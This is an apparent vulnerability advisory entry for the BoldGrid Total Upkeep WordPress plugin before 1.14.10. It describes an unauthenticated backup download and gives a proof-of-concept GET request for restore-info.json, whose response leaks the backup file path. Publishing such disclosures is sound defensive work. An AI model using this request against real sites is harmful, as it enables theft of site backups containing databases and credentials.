Total Upkeep by BoldGrid < 1.14.10 - Unauthenticated Backup Download
Description
The plugin does not restrict access to a file containing sensitive information, such as the internal path of backups, which may then allow unauthenticated users to download them.
Proof of Concept
The filepath in /wp-content/plugins/boldgrid-backup/cron/restore-info.json will reveal the internal path of the backup file, which might be publicly accessible.
GET /wp-content/plugins/boldgrid-backup/cron/restore-info.json
{
[...]
"filepath":"/wp-content/boldgrid_backup_[RANDOM]/boldgrid-backup-www.example.com_wordpress-[RANDOM]-[DATE]-XXXXXX.zip"
[...]
} Affects Plugins
Fixed in version 1.14.10✓
References
ExploitDB
Classification
Miscellaneous
Timeline
Publicly Published
2020-12-14 (about 9 months ago)
Added
2020-12-14 (about 9 months ago)
Last Updated
2020-12-15 (about 9 months ago)